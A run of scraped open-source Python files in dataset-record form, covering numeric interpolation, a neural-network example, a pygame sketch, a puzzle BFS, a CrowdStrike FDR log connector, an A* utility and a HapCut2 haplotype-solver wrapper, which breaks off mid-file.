https://stackoverflow.com/a/8505658/827927\n\t\t\tif saveAfterEachSample:\n\t\t\t\tself.saveTable()\n\t\tself.smoothTable()\n\n\tdef calculateRegressionFunction(self, type:str):\n\t\t\"\"\"\n\t\t:param type: \"linlin\" or \"linlin2\" or \"loglog\"\n\t\t\"\"\"\n\t\tif self.xValues is None or self.yValuesSmoothed is None:\n\t\t\traise Exception(\"run calculateTable first\")\n\t\txValues = self.xValues\n\t\t# yValues = self.yValuesSmoothed\n\t\tyValues = self.yValuesAverage\n\t\t# yValues = [item for sublist in self.yValuesSamples for item in sublist] # flatten values in all samples\n\t\tif type=='linlin':\n\t\t\tregressionCoeffs = np.polyfit(xValues, yValues, 1)\n\t\t\tself.regressionString = \"{} ~ {:.2e} {} + {:.2e}\".format(self.yName, regressionCoeffs[0], self.xName, regressionCoeffs[1])\n\t\t\tself.regressionFunction = lambda x: regressionCoeffs[0]*x + regressionCoeffs[1]\n\t\telif type=='linlin2':\n\t\t\tregressionCoeffs = np.polyfit(xValues, yValues, 2)\n\t\t\tself.regressionString = \"{} ~ {:.2e} {}^2 + {:.2e} {} + {:.2e}\".format(self.yName, regressionCoeffs[0], self.xName, regressionCoeffs[1], self.xName, regressionCoeffs[2])\n\t\t\tself.regressionFunction = lambda x: regressionCoeffs[0]*x**2 + regressionCoeffs[1]*x + regressionCoeffs[2]\n\t\telif type=='loglog':\n\t\t\tregressionCoeffs = np.polyfit(np.log(xValues), np.log(yValues), 1)\n\t\t\tself.regressionString = \"ln({}) ~ {:.2e} ln({}) + {:.2e}\".format(self.yName, regressionCoeffs[0], self.xName, regressionCoeffs[1])\n\t\t\tself.regressionFunction = lambda x: np.exp(regressionCoeffs[0]*np.log(x) + regressionCoeffs[1])\n\t\telse:\n\t\t\traise Exception(\"type should be linlin or loglog\")\n\n\tdef smoothTable(self):\n\t\tif self.yValuesSamples is not None and len(self.yValuesSamples)>0:\n\t\t\tself.yValuesAverage = np.mean(self.yValuesSamples[:,:],axis=0)\n\t\t\tself.yValuesSmoothed = ironing.iron(self.yValuesAverage)\n\n\tdef getYValue(self, xValue:float):\n\t\tif self.xValues is None or self.yValuesSmoothed is None:\n\t\t\traise Exception(\"run calculateTable first\")\n\t\tif self.regressionFunction is None:\n\t\t\treturn np.interp(xValue, self.xValues, self.yValuesSmoothed)\n\t\telse:\n\t\t\treturn self.regressionFunction(xValue)\n\n\tdef plotTable(self, xValues:list=None, numOfSamplesToShow:int=None, plotAverage=True, plotMonotone=False):\n\t\tif self.xValues is None or self.yValuesSamples is None:\n\t\t\traise Exception(\"run calculateTable first\")\n\t\tif xValues is None:\n\t\t\txValues = self.xValues\n\t\tif numOfSamplesToShow is None:\n\t\t\tnumOfSamplesToShow = len(self.yValuesSamples)\n\t\telse:\n\t\t\tnumOfSamplesToShow = min(numOfSamplesToShow, len(self.yValuesSamples))\n\t\tf, ax = plt.subplots(2, 1, sharex=True, figsize=(8,8))\n\t\tfor i in range(0, numOfSamplesToShow):\n\t\t\tax[0].plot(xValues, self.yValuesSamples[i], 'g--')\n\t\tax[0].plot(xValues, self.yValuesAverage, 'b', label=\"Average of {} samples\".format(len(self.yValuesSamples)))\n\t\tax[0].set_ylabel(\"Exact \"+self.yName)\n\t\tax[0].legend(loc=0)\n\t\tax[0].set_xlabel(self.xName)\n\t\tif plotAverage:\n\t\t\tax[1].plot(xValues,self.yValuesAverage,'b',label='Average')\n\t\tif plotMonotone:\n\t\t\tax[1].plot(xValues,self.yValuesSmoothed,'r.',label='Monotone')\n\t\tax[1].set_ylabel(\"Approximate \"+self.yName)\n\t\txValuesForInterpolation = np.concatenate( (xValues/2, xValues/2+xValues[-1]/2) )\n\t\tax[1].plot(xValuesForInterpolation, [self.getYValue(x) for x in xValuesForInterpolation],'g',linewidth=3.0,label='Regression')\n\t\tax[1].legend(loc=0)\n\t\tax[1].set_xlabel(self.regressionString)\n\t\treturn ax\n\n\tdef plotTableLogLog(self):\n\t\tif self.xValues is None or self.yValuesSamples is None:\n\t\t\traise Exception(\"run calculateTable first\")\n\t\tf, ax = plt.subplots(3, 2, sharex='col', sharey=False, figsize=(12,12))\n\t\tfor i in range(0,len(self.yValuesSamples)):\n\t\t\tax[0][0].plot(self.xValues, self.yValuesSamples[i], 'g--')\n\t\tax[0][0].plot(self.xValues, self.yValuesAverage, 'b', label=\"Average of {} samples\".format(len(self.yValuesSamples)))\n\t\tax[0][0].set_ylabel(\"Optimal \"+self.yName)\n\t\tax[0][0].legend(loc=0)\n\t\tax[1][0].plot(self.xValues,self.yValuesSmoothed)\n\t\tax[1][0].set_ylabel(\"Monotone \"+self.yName)\n\t\txValuesForInterpolation = np.concatenate( (self.xValues/2, self.xValues/2+self.xValues[-1]/2) )\n\t\tax[2][0].plot(xValuesForInterpolation, [self.getYValue(x) for x in xValuesForInterpolation])\n\t\tax[2][0].set_ylabel(\"Interpolated \"+self.yName)\n\t\tax[2][0].set_xlabel(self.xName)\n\n\t\tfor i in range(0,len(self.yValuesSamples)):\n\t\t\tax[0][1].loglog(self.xValues, self.yValuesSamples[i], 'g--')\n\t\tax[0][1].loglog(self.xValues, self.yValuesAverage, 'b', label=\"Average of {} samples\".format(len(self.yValuesSamples)))\n\t\tax[0][1].set_ylabel(\"Optimal \"+self.yName)\n\t\tax[0][1].legend(loc=0)\n\n\t\tax[1][1].loglog(self.xValues,self.yValuesSmoothed)\n\t\tloglogRegression = np.polyfit(np.log(self.xValues), np.log(self.yValuesSmoothed), 1)\n\t\tloglogRegressionString = \"ln({}) = {:.2f} ln({}) + {:.2f}\".format(self.yName, loglogRegression[0], self.xName, loglogRegression[1])\n\t\tax[1][1].set_ylabel(\"Monotone \"+self.yName)\n\t\tax[1][1].set_xlabel(loglogRegressionString)\n\n\t\txValuesForInterpolation = np.concatenate( (self.xValues/2, self.xValues/2+self.xValues[-1]/2) )\n\t\tax[2][1].loglog(xValuesForInterpolation, [self.getYValue(x) for x in xValuesForInterpolation])\n\t\tax[2][1].set_ylabel(\"Interpolated \"+self.yName)\n\t\tax[2][1].set_xlabel(self.xName)\n\n\n\tdef saveTable(self):\n\t\tif self.xValues is None or self.yValuesSamples is None:\n\t\t\tprint(\"WARNING: tables of \"+self.yName+\" vs \"+self.xName+\" not calculated yet\")\n\t\t\treturn\n\t\tnp.savez(self.fileName,\n\t\t\txValues=self.xValues,\n\t\t\tyValuesSamples=self.yValuesSamples,\n\t\t\t)\n\n\tdef loadTable(self,regressionType=None):\n\t\tif not os.path.isfile(self.fileName):\n\t\t\tprint(\"WARNING: file \"+self.fileName+\" does not exist\")\n\t\t\treturn\n\t\tdata = np.load(self.fileName)\n\t\tarrays = {name:value for (name,value) in data.iteritems()}\n\t\tself.xValues = arrays.get('xValues')\n\t\tself.yValuesSamples = arrays.get('yValuesSamples')\n\t\tself.smoothTable()\n\t\tif regressionType:\n\t\t\tself.calculateRegressionFunction(type=regressionType)\n\n\tdef setTable(self, xValues, yValuesSamples):\n\t\tself.xValues = xValues\n\t\tself.yValuesSamples = yValuesSamples\n\t\tself.smoothTable()\n\n\tdef isTableCalculated(self):\n\t\treturn self.xValues is not None and self.yValuesSamples is not None\n\n\n\nif __name__ == \"__main__\":\n\ttable = InterpolationTable(xName=\"x\", yName=\"y\", fileName=\"interpolation-tables/InterpolationTableDemo.npz\",\n\t\tvalueCalculationFunction=lambda x,iSample:np.sin(x)+np.random.random())\n\tfilename=\"InterpolationTableDemo.npz\"\n\ttable.loadTable()\n\tprint(\"current num of samples: \", table.numOfSamples())\n\ttable.calculateTable(xValues=np.linspace(0,10,10000), numOfSamples=30, recreateAllSamples=False, saveAfterEachSample=True)\n\ttable.plotTable(numOfSamplesToShow=100); plt.show()\n\ttable.saveTable()\n","repo_name":"erelsgl/bitcoin-simulations","sub_path":"InterpolationTable.py","file_name":"InterpolationTable.py","file_ext":"py","file_size_in_byte":9073,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"34897233900","text":"import numpy as np\nfrom train_ann import *\n\nx_m = 1000 # number of samples\nx = np.random.default_rng().uniform(-5, 5, x_m)\ny = np.random.default_rng().uniform(-5, 5, x_m)\nX = np.array((x, y)).T\n\nF = []\nfor i in range(0, x_m, 1):\n f = np.array([[100 * (y[i] - x[i] ** 2) ** 2 + (1 - x[i]) ** 2, x[i]*y[i]]])\n F.append(*f.reshape(1,2))\nF = np.array(F)\nif f.ndim==1:\n F = F.reshape(-1, 1)\n\nmodel = Model(X.shape[1],F.shape[1])\nANN = train_ann(model, X, F, learning_rate=1e-3, plot=False)\n\n\nys = ANN.predict(X)\n\n\nprint('2')\n","repo_name":"panos108/Model-Predictive-Control-for-Batch-and-Continuous","sub_path":"train_example.py","file_name":"train_example.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"47"} +{"seq_id":"37778971863","text":"# não está pronto, só comecei o projeto\r\nimport pygame as pyg\r\nFPS = 60\r\nclock = pyg.time.Clock()\r\nfrom pygame.locals import *\r\n\r\npyg.init()\r\n\r\nWINDOW_SIZE = [800, 600]\r\nscreen = pyg.display.set_mode(WINDOW_SIZE, RESIZABLE)\r\n\r\n\r\nclass Game:\r\n def __init__(self):\r\n COLOR_INACTIVE = pyg.Color('lightskyblue3')\r\n COLOR_ACTIVE = pyg.Color('dodgerblue2')\r\n fonte = pyg.font.SysFont('consolas', 50)\r\n digitado = ['']\r\n size_max = 200\r\n class InputBox:\r\n def __init__(self, x, y, w, h, text=''):\r\n self.rect = pyg.Rect(x, y, w, h)\r\n self.color = COLOR_ACTIVE\r\n self.text = text\r\n self.txt_surface = fonte.render(text, True, self.color)\r\n self.ativo = True\r\n\r\n def handle_event(self, event):\r\n global digitado\r\n if event.type == pyg.MOUSEBUTTONDOWN:\r\n self.ativo = True\r\n self.color = COLOR_ACTIVE if self.ativo else COLOR_INACTIVE\r\n if event.type == KEYDOWN:\r\n if self.ativo:\r\n if event.key == K_RETURN:\r\n digitado[0] = self.text\r\n self.text = ''\r\n elif event.key == K_BACKSPACE:\r\n self.text = self.text[:-1]\r\n else:\r\n self.text += event.unicode\r\n self.txt_surface = FONT.render(self.text, True, self.color)\r\n\r\n def update(self):\r\n width = max(size_max, self.txt_surface.get_width() + 10)\r\n self.rect.w = width\r\n\r\n def draw(self, scr):\r\n scr.blit(self.txt_surface, (self.rect.x + 5, self.rect.y + 5))\r\n pyg.draw.rect(screen, self.color, self.rect, 2)\r\n\r\n def update():\r\n global done\r\n clock.tick(FPS)\r\n for e in pyg.event.get():\r\n if e.type == QUIT or e.type == KEYDOWN and e.key == K_ESCAPE:\r\n pyg.quit()\r\n\r\n def render():\r\n screen.fill((0, 0, 10))\r\n\r\n while True:\r\n try:\r\n update()\r\n render()\r\n pyg.display.update()\r\n except pyg.error:\r\n break\r\n\r\n\r\nif __name__ == '__main__':\r\n Game()\r\n exit()\r\n","repo_name":"erikfritas/escola","sub_path":"com interface/fisica/forcaEletrica.py","file_name":"forcaEletrica.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"34651072000","text":"from collections import deque\n\nN, M = map(int, input().split())\nboard = []\nfor _ in range(N):\n board.append(input())\n\nred = blue = goal = tuple()\nfor y in range(N):\n for x in range(M):\n if board[y][x] == 'R':\n red = (y, x)\n elif board[y][x] == 'B':\n blue = (y, x)\n elif board[y][x] == 'O':\n goal = (y, x)\nQ = deque()\nvisit = [[0] * M for _ in range(N)]\nQ.append(red)\nvisit[red[0]][red[1]] = 1\n\ndy = [-1, 1, 0, 0]\ndx = [0, 0, -1, 1]\n\nd = []\ncnt = 0\nwhile Q:\n y, x = Q.popleft()\n if y == goal[0] and x == goal[1]:\n print(visit[y][x]-1)\n print(cnt)\n break\n\n for i in range(4):\n ty = y + dy[i]\n tx = x + dx[i]\n if ty < 0 or ty > N-1 or tx < 0 or tx > M-1:\n continue\n if (board[ty][tx] == '.' or board[ty][tx] == 'O') and visit[ty][tx] == 0:\n\n if not d:\n d.append(i)\n elif d[-1] != i:\n d.append(i)\n visit[ty][tx] = visit[y][x] + 1\n Q.append((ty, tx))\n\nfor z in range(N):\n print(visit[z])\nprint(d)","repo_name":"potomatoo/TIL","sub_path":"Baekjoon/boj_13460_구슬탈출2.py","file_name":"boj_13460_구슬탈출2.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40756562371","text":"#!/usr/bin/env python3\n\nimport sys,os,getopt\nimport traceback\nimport os\nimport fcntl\nimport json\nimport requests\nimport time\nimport re\nimport boto3\nimport gzip\nimport datetime\n\nfrom six import PY2\n\nif PY2:\n get_unicode_string = unicode\nelse:\n get_unicode_string = str\n\nsys.path.insert(0, './ds-integration')\nfrom DefenseStorm import DefenseStorm\n\nfrom html.parser import HTMLParser\n\nclass integration(object):\n\n\n JSON_field_mappings = {\n 'aid' : 'device_id',\n 'aip' : 'external_ip',\n 'ContextProcessId' : 'process_id',\n 'ContextThreadId' : 'thread_id',\n 'event_platform' : 'os_type',\n 'ComputerName' : 'client_hostname',\n 'event_simpleName' : 'category',\n 'FileName' : 'file_name',\n 'FilePath' : 'file_path',\n 'CommandLine' : 'command_line',\n 'ImageFileName' : 'image',\n 'Name' : 'event_name',\n 'CID' : 'log_id',\n 'TargetFileName' : 'target_filename',\n }\n\n def get_S3_files(self, sqs_msg):\n if not os.path.isdir('datadir'):\n os.mkdir('datadir')\n if len(os.listdir('datadir')) >= 1:\n self.ds.log('WARNING', \"datadir/ is not empty. A previous run might have failed. Cleaning Up\")\n file_list = os.listdir('datadir')\n for thisfile in file_list:\n self.ds.log('WARNING', \"Removing datadir/\" + thisfile)\n try:\n os.remove('datadir/' + thisfile)\n except Exception as e:\n self.ds.log('ERROR', \"Exception {0}\".format(str(e)))\n self.ds.log('ERROR', \"Cleanup datadir/ error for file \" + thisfile)\n pass\n\n my_bucket = self.s3.Bucket(sqs_msg['bucket'])\n obj_list = my_bucket.objects.filter(Prefix = sqs_msg['pathPrefix'])\n Found = False\n file_list = []\n for b_obj in obj_list:\n file_list.append(b_obj.key)\n if '_SUCCESS' in b_obj.key:\n Found = True\n if not Found:\n return None\n self.ds.log('INFO', \"Downloading files: %s\" %(str(file_list)))\n downloaded_files = []\n for filename in file_list:\n if '_SUCCESS' in filename:\n continue\n self.ds.log('INFO', \"Downloading file: %s\" %(str(filename)))\n my_bucket.download_file(filename, 'datadir/' + filename.replace('/','_'))\n downloaded_files.append(filename.replace('/','_'))\n return downloaded_files\n\n\n def get_SQS_message(self):\n try:\n response = self.sqs.receive_message(\n QueueUrl=self.sqs_url,\n AttributeNames=[\n 'SentTimestamp'\n ],\n MaxNumberOfMessages=1,\n MessageAttributeNames=[\n 'All'\n ],\n VisibilityTimeout=0,\n WaitTimeSeconds=0\n )\n except Exception as e:\n traceback.print_exc()\n self.ds.log('ERROR', \"Exception {0}\".format(str(e)))\n return None, None, None\n\n notification_time = response\n if 'Messages' not in response.keys():\n self.ds.log('INFO', \"No more SQS Notifications to handle\")\n return None, None, None\n\n msg_count = len(response['Messages'])\n if msg_count < 1:\n self.ds.log('INFO', \"No SQS Notifications to handle\")\n return None, None, None\n if msg_count > 1:\n self.ds.log('ERROR', \"Should never get more than one message from SQS\")\n return None, None, None\n message = response['Messages'][0]\n msg_body = json.loads(message['Body'])\n return message['ReceiptHandle'], message['MessageId'], msg_body\n\n def handle_local_files(self, local_files):\n for thisfile in local_files:\n self.ds.log('INFO', \"Processing file %s\" %(thisfile))\n f_name = 'datadir/' + thisfile\n if 'managedassets' in thisfile:\n category = 'managedassets'\n elif 'aid_master' in thisfile:\n category = 'aid_master'\n elif 'notmanaged' in thisfile:\n category = 'notmanaged'\n else:\n category = None\n try:\n with gzip.open(f_name) as f:\n for line in f:\n event = json.loads(str(line, 'utf-8'))\n if category != None:\n event['category'] = category\n event['message'] = category + ' event'\n elif 'ComputerName' in event.keys() and 'event_simpleName' in event.keys():\n\n event['message'] = event['ComputerName'] + ' - ' + event['event_simpleName']\n elif 'event_simpleName' in event.keys():\n event['message'] = event['event_simpleName'] + ' - Crowdstrike FDR Data Event'\n else:\n event['message'] = 'Crowdstrike FDR Data Event'\n if 'ContextTimeStamp' in event.keys():\n if event['ContextTimeStamp'] != '':\n self.ds.log(\"INFO\", 'ContextTimeStamp: \"%s\"' %str(event['ContextTimeStamp']))\n event['receive_time'] = event['timestamp']\n event['timestamp'] = event['ContextTimeStamp']\n #del event['ContextTimeStamp']\n if 'timestamp' in event.keys():\n if event['timestamp'] == '':\n event['cs_timestamp'] = event['timestamp']\n del event['timestamp']\n if 'ScriptContentBytes' in event.keys():\n event['ScriptContentBytes'] = \"Bytes Removed\"\n self.ds.writeJSONEvent(event, JSON_field_mappings = self.JSON_field_mappings)\n except Exception as e:\n self.ds.log('ERROR', \"Exception: Error handling file %s: %s\" %(f_name, e))\n return False\n os.remove(f_name)\n return True\n\n def delete_SQS_message(self, sqs_rh):\n #return True\n self.ds.log('INFO', \"Deleting SQS Notification: %s\" %(sqs_rh))\n if self.testing:\n self.ds.log('INFO', \"Skipping deleting of SQS Notification.\")\n return True\n try:\n self.sqs.delete_message(QueueUrl = self.sqs_url, ReceiptHandle = sqs_rh)\n except Exception as e:\n self.ds.log('ERROR', \"Exception: Failed to delete SQS Notification: %s - %s\" %(sqs_rh, e))\n return False\n return True\n\n def cs_main(self): \n\n self.s3_key = self.ds.config_get('crowdstrike', 's3_key')\n self.s3_secret = self.ds.config_get('crowdstrike', 's3_secret')\n self.sqs_url = self.ds.config_get('crowdstrike', 'sqs_url')\n self.s3_idenfifier = self.ds.config_get('crowdstrike', 's3_identifier')\n self.history = self.ds.config_get('crowdstrike', 'history')\n\n try:\n self.sqs = boto3.client('sqs', region_name='us-west-1', aws_access_key_id=self.s3_key, aws_secret_access_key=self.s3_secret)\n self.s3 = boto3.resource('s3', aws_access_key_id=self.s3_key, aws_secret_access_key=self.s3_secret)\n except Exception as e:\n traceback.print_exc()\n self.ds.log('ERROR', \"Exception {0}\".format(str(e)))\n return\n\n sqs_rh, msg_id, sqs_msg = self.get_SQS_message()\n\n while sqs_rh != None:\n self.ds.log('INFO', \"Processing Notification: %s\" %(msg_id))\n self.ds.log('INFO', \"Processing Notification Message: %s\" %(sqs_msg))\n notification_time = int(sqs_msg['timestamp']) / 1000\n current_epoch = time.time()\n self.ds.log('INFO', \"Notification: %s, Timestamp %s\" %(msg_id, datetime.datetime.utcfromtimestamp(int(sqs_msg['timestamp']/1000)).isoformat() + 'Z'))\n if (current_epoch - notification_time) > (int(self.history) * 60 * 60):\n self.ds.log('INFO', \"Message %s older than %s hours, deleting from SQS.\" %(msg_id, self.history))\n if not self.delete_SQS_message(sqs_rh):\n self.ds.log('ERROR', \"Deleting SQS Notification - %s\" %(sqs_rh))\n return\n else:\n self.ds.log('INFO', \"Downloading files for notification: %s\" %(msg_id))\n local_files = self.get_S3_files(sqs_msg)\n if local_files == None:\n self.ds.log('ERROR', \"Error getting local files. Ending Run.\")\n return\n if not self.handle_local_files(local_files):\n self.ds.log('ERROR', \"Error handling downloaded files. Exiting.\")\n return\n if not self.delete_SQS_message(sqs_rh):\n self.ds.log('ERROR', \"Deleting old SQS Notification - %s\" %(sqs_rh))\n return\n sqs_rh, msg_id, sqs_msg = self.get_SQS_message()\n \n\n def run(self):\n try:\n pid_file = self.ds.config_get('crowdstrike', 'pid_file')\n fp = open(pid_file, 'w')\n try:\n fcntl.lockf(fp, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except IOError:\n self.ds.log('ERROR', \"An instance of cb defense syslog connector is already running\")\n # another instance is running\n sys.exit(0)\n self.cs_main()\n except Exception as e:\n traceback.print_exc()\n self.ds.log('ERROR', \"Exception {0}\".format(str(e)))\n return\n \n def usage(self):\n print\n print(os.path.basename(__file__))\n print\n print(' No Options: Run a normal cycle')\n print\n print(' -t Testing mode. Do all the work but do not send events to GRID via ')\n print(' syslog Local7. Instead write the events to file \\'output.TIMESTAMP\\'')\n print(' in the current directory')\n print\n print(' -l Log to stdout instead of syslog Local6')\n print\n \n def __init__(self, argv):\n\n self.testing = False\n self.send_syslog = True\n self.ds = None\n \n try:\n opts, args = getopt.getopt(argv,\"htnld:\",[\"datedir=\"])\n except getopt.GetoptError:\n self.usage()\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n self.usage()\n sys.exit()\n elif opt in (\"-t\"):\n self.testing = True\n elif opt in (\"-l\"):\n self.send_syslog = False\n \n try:\n self.ds = DefenseStorm('crowdstrikeFDREventLogs', testing=self.testing, send_syslog = self.send_syslog)\n except Exception as e:\n traceback.print_exc()\n try:\n self.ds.log('ERROR', 'ERROR: ' + str(e))\n except:\n pass\n\n\nif __name__ == \"__main__\":\n i = integration(sys.argv[1:]) \n i.run()\n","repo_name":"DefenseStorm/crowdstrikeFDREventLogs","sub_path":"crowdstrikeFDREventLogs.py","file_name":"crowdstrikeFDREventLogs.py","file_ext":"py","file_size_in_byte":11182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1950103285","text":"\n######################################################################################################################\nclass Node:\n def __init__(self, x, y, elevation) -> None:\n self.x = x\n self.y = y\n self.parent: Node = None # type: ignore\n self.g_cost = 0\n self.h_cost = 0\n \n def get_f_cost(self):\n return self.g_cost + self.h_cost\n\n def get_distance(self, node):\n # return ((self.y - node.y)**2 + (self.x - node.x)**2)**(1/2)\n # return abs(self.y - node.y) + abs(self.x - node.x)\n raise NotImplementedError\n\n def get_neighbors(self, nodes):\n neighbors = []\n directions = [(1,0), (-1,0), (0,1),(0,-1)]\n for dx, dy in directions:\n new_x, new_y = self.x + dx, self.y + dy\n \n if 0 <= new_x < len(nodes[0]) and 0 <= new_y < len(nodes):\n neighbor = nodes[new_y][new_x]\n neighbors.append(neighbor)\n raise NotImplementedError\n return neighbors\n\n\ndef a_star(start: Node, end: Node, nodes:list[list[Node]]):\n open_nodes: list[Node] = [start]\n closed_nodes: list[Node]= []\n \n while open_nodes:\n current: Node = min(open_nodes, key=lambda n: (n.get_f_cost(), n.g_cost))\n open_nodes.remove(current)\n closed_nodes.append(current) \n if current == end:\n print(\"Found it!\")\n return\n \n neighbors: list[Node] = current.get_neighbors(nodes)\n \n for neighbor in neighbors:\n if neighbor in closed_nodes:\n continue\n \n movement_cost_to_neighbor = current.g_cost + current.get_distance(neighbor)\n\n if (movement_cost_to_neighbor < neighbor.g_cost) or (neighbor not in open_nodes):\n neighbor.g_cost = movement_cost_to_neighbor\n neighbor.h_cost = neighbor.get_distance(end)\n neighbor.parent = current\n \n if neighbor not in open_nodes:\n open_nodes.append(neighbor)\n \n raise Exception(\"Could not find\")\n######################################################################################################################\ndef bubble_sort(lst):\n for i in range(len(lst) - 1):\n for j in range(len(lst) - 1 - i):\n if lst[j] > lst[j + 1]:\n lst[j], lst[j + 1] = lst[j + 1], lst[j]\n","repo_name":"Pasorra/adventofcode","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74938904141","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom __future__ import annotations\nfrom typing import Sequence, IO, Iterator\nimport collections\nimport os\nimport sys\nfrom dataclasses import dataclass\nimport json\nimport time\nimport subprocess\nimport tempfile\nimport numpy as np\nfrom numpy.typing import NDArray\nimport pandas as pd\nfrom scipy.sparse import csr_array, save_npz, load_npz\n\n\nclass AlleleMatrix:\n def __init__(self, sparse_matrix: csr_array):\n self._sparse_matrix = sparse_matrix\n\n @classmethod\n def from_fragments(\n cls, fragments: Sequence[Sequence[int]], missing_value: int = -1\n ):\n dense_matrix = np.array(fragments, dtype=np.int8)\n sparse_matrix: csr_array\n if missing_value == -1:\n sparse_matrix = csr_array(dense_matrix + 1, dtype=np.int8)\n elif missing_value == 0:\n sparse_matrix = csr_array(dense_matrix, dtype=np.int8)\n else:\n raise ValueError(\n f\"Invalid value for `missing_value`: {missing_value!r}. Expecting -1 or 0.\"\n )\n return cls(sparse_matrix)\n\n def get_fragment(self, i: int) -> NDArray:\n return self._sparse_matrix.getrow(i).toarray()[0]\n\n def to_npz(self, file: str | IO) -> None:\n save_npz(file, self._sparse_matrix)\n\n @classmethod\n def from_npz(cls, file: str | IO):\n return cls(load_npz(file))\n\n @classmethod\n def from_json(cls, file: str | IO, missing_value: int = -1):\n fragments: Sequence[Sequence[int]]\n if isinstance(file, str):\n with open(file, \"rt\") as f:\n fragments = json.load(f)\n else:\n fragments = json.load(file)\n return cls.from_fragments(fragments, missing_value=missing_value)\n\n @classmethod\n def from_json_string(cls, string: str, missing_value: int = -1):\n fragments = json.loads(string)\n return cls.from_fragments(fragments, missing_value=missing_value)\n\n @property\n def shape(self) -> tuple[int, int]:\n return self._sparse_matrix.shape\n\n def __len__(self) -> int:\n return self.shape[0]\n\n def __iter__(self) -> Iterator[NDArray]:\n for i in range(len(self)):\n yield self.get_fragment(i)\n\n def _column_sum(self) -> NDArray:\n return np.squeeze(np.asarray(self._sparse_matrix.sum(axis=0)))\n\n def _row_sum(self) -> NDArray:\n return np.squeeze(np.asarray(self._sparse_matrix.sum(axis=1)))\n\n def get_empty_loci(self) -> Sequence[int]:\n return [j for j, total in enumerate(self._column_sum()) if total == 0]\n\n def get_empty_fragments(self) -> Sequence[int]:\n return [i for i, total in enumerate(self._row_sum()) if total == 0]\n\n def get_nonzero_loci(self, i: int) -> Sequence[int]:\n return self._sparse_matrix.getrow(i).nonzero()[1]\n\n\n@dataclass(eq=True)\nclass _MECSolverResult:\n haplotypes: tuple[NDArray, NDArray]\n partition: Sequence[int]\n cost: float\n\n def to_json(self, missing_value: int = -1):\n if missing_value == -1:\n return json.dumps(\n dict(\n haplotypes=[(haplotype - 1).tolist() for haplotype in self.haplotypes],\n partition=list(self.partition),\n cost=float(self.cost),\n )\n )\n elif missing_value == 0:\n return json.dumps(\n dict(\n haplotypes=[haplotype.tolist() for haplotype in self.haplotypes],\n partition=list(self.partition),\n cost=float(self.cost),\n )\n )\n else:\n raise ValueError(\n f\"Invalid value for `missing_value`: {missing_value!r}. Expecting -1 or 0.\"\n )\n\n\nclass MECSolver:\n def __init__(self, matrix: AlleleMatrix):\n self.matrix: AlleleMatrix = matrix\n self._empty_loci = matrix.get_empty_loci()\n\n @classmethod\n def from_fragments(cls, fragments: Sequence[Sequence[int]]):\n matrix = AlleleMatrix.from_fragments(fragments)\n return cls(matrix)\n\n @property\n def n_locus(self) -> int:\n return self.matrix.shape[1]\n\n @property\n def n_fragment(self) -> int:\n return self.matrix.shape[0]\n\n @staticmethod\n def _make_vcf(\n n_locus: int,\n output_path: str,\n *,\n ref_alleles: Sequence[str] | None = None,\n alt_alleles: Sequence[str] | None = None,\n genotypes: Sequence[str] | None = None,\n ) -> None:\n VCF_HEADER = [\n \"#CHROM\",\n \"POS\",\n \"ID\",\n \"REF\",\n \"ALT\",\n \"QUAL\",\n \"FILTER\",\n \"INFO\",\n \"FORMAT\",\n \"Sample_0\",\n ]\n chromosome = [\"ref\"] * n_locus\n pos = [i * 100 + 1 for i in range(n_locus)]\n variant_id = [\".\"] * n_locus\n ref = [\"A\"] * n_locus if ref_alleles is None else ref_alleles\n alt = [\"T\"] * n_locus if alt_alleles is None else alt_alleles\n qual = [60] * n_locus\n filter_ = [\".\"] * n_locus\n info = [\".\"] * n_locus\n format_ = [\"GT\"] * n_locus\n gt = [\".\"] * n_locus if genotypes is None else genotypes\n data = {\n k: v\n for k, v in zip(\n VCF_HEADER,\n [\n chromosome,\n pos,\n variant_id,\n ref,\n alt,\n qual,\n filter_,\n info,\n format_,\n gt,\n ],\n )\n }\n df = pd.DataFrame(data)\n df.to_csv(output_path, index=False, sep=\"\\t\")\n\n def _make_fragments(self, output_path: str, *, fragment_names=None) -> None:\n n_fragment, n_locus = self.n_fragment, self.n_locus\n matrix = self.matrix\n _fragment_names = (\n [f\"F{i+1}\" for i in range(n_fragment)]\n if fragment_names is None\n else fragment_names\n )\n\n FRAGMENT_TYPE = 0 # 0 for normal, 1 for HiC\n BARCODE = -1\n MATE_INDEX = -1\n\n with open(output_path, \"wt\") as f:\n for i, fragment in enumerate(self.matrix):\n nonzero_loci = self.matrix.get_nonzero_loci(i)\n\n block_start_indices: list[int] = []\n previous_j: int = -1\n for j in nonzero_loci:\n if j == 0 or j != previous_j + 1:\n block_start_indices.append(j)\n previous_j = j\n\n fragment_string = \"\".join(\n [str(a) if a >= 0 else \" \" for a in fragment - 1]\n )\n blocks: list[str] = [\n block for block in fragment_string.strip(\" \").split(\" \") if block\n ]\n quality_string = \".\" * len(nonzero_loci)\n block_string = \" \".join(\n [f\"{s+1} {b}\" for s, b in zip(block_start_indices, blocks)]\n )\n\n line = f\"{len(blocks)} {_fragment_names[i]} {FRAGMENT_TYPE} {BARCODE} {MATE_INDEX} {block_string} {quality_string}\\n\"\n f.write(line)\n\n def _run_hapcut2(\n self,\n fragments_path: str,\n vcf_path: str,\n output_path: str,\n *,\n prune=False,\n call_homozygous=False,\n verbose=False,\n ) -> None:\n directory = os.path.commonprefix([fragments_path, vcf_path, output_path])\n command = [\n \"hapcut2\",\n \"--fragments\",\n fragments_path,\n \"--VCF\",\n vcf_path,\n \"--output\",\n output_path,\n \"--outvcf\",\n \"0\",\n \"--call_homozygous\",\n \"1\" if call_homozygous else \"0\",\n \"--new_format\",\n \"1\",\n \"--verbose\",\n \"0\",\n \"--error_analysis_mode\",\n 